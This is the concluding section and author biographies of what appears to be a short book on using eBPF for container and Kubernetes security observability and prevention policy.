Containers are implemented as namespace, capabilities, and cgroups
in the Linux kernel, and eBPF operates natively in the kernel,
natively supporting container visibility. eBPF dynamically config‐
ures security observability and prevention policy enforcement for all
workloads in a cluster without any restart or changes to your appli‐
cations or infrastructure. eBPF gives security teams an unmatched
level of visibility into their workloads via several hook points in the
kernel, including process execution, network sockets, file access, and
generic kprobes and uprobes. This security observability enables full
visibility of the four golden signals of container security.
Because eBPF operates natively in the kernel, we can also gain
visibility and create prevention policy for the underlying Kubernetes
worker node, providing detection in depth for your cloud native
environment. With visibility of the full MITRE ATT&CK frame‐
57
work, security observability is the only data point you need to objec‐
tively understand the security of your environment.
eBPF isn’t just about observability; it also creates an improved pre‐
vention policy and framework over traditional security tools. When
developing a policy, it’s critical that you use the security observa‐
bility to create a prevention policy based on observed application
behavior. Testing your policies for safety from outages in a develop‐
ment or staging environment follows DevOps/SRE best practices.
If you have a team that isn’t well-versed in security or is wondering
how to get started, participating in CTFs and red team assessments
are a great way to learn the techniques of an attack while generat‐
ing eBPF events that represent the behaviors of real-world attacks.
These events can be applied to generate prevention policies across
the spectrum of the MITRE framework for a defense-in-depth
approach to securing your workloads.
The future of eBPF is still uncharted, but if we peer into the future
we might see a world where BPF logic is just a logical part of an
application. In this model, your application comes with some BPF
code, and while technically it’s extending the kernel in some sense,
it’s extending the functionality of the application to react to events in
a way that doesn’t require a kernel extension. One thing we can be
sure of is that eBPF for security is just getting started.
58 | Conclusion
About the Authors
Jed Salazar is passionate about engineering trustworthy distributed
systems. His journey led him to work as an SRE on Borg clusters
and security engineering for Alphabet companies at Google. Since
then he’s worked with some of the most sophisticated Kubernetes
environments in the world, advocating defense-in-depth security
from the supply chain to container runtime. In his free time, he
enjoys trail running with dogs in the mountains and touring the
west in a van with his partner.
Natalia Reka Ivanko is a security engineer with a strong back‐
ground in container and cloud native security. She is passionate
about building things that matter and working with site reliability
and software engineers to develop and apply security best practi‐
ces. She is inclined towards innovative technologies like eBPF and
Kubernetes, loves being hands on, and is always looking for new
challenges and growth. She is a big believer in open source and
automation. In her free time she loves flying as a private pilot,
experiencing outdoor activities like surfing and running, and getting
to know new cultures.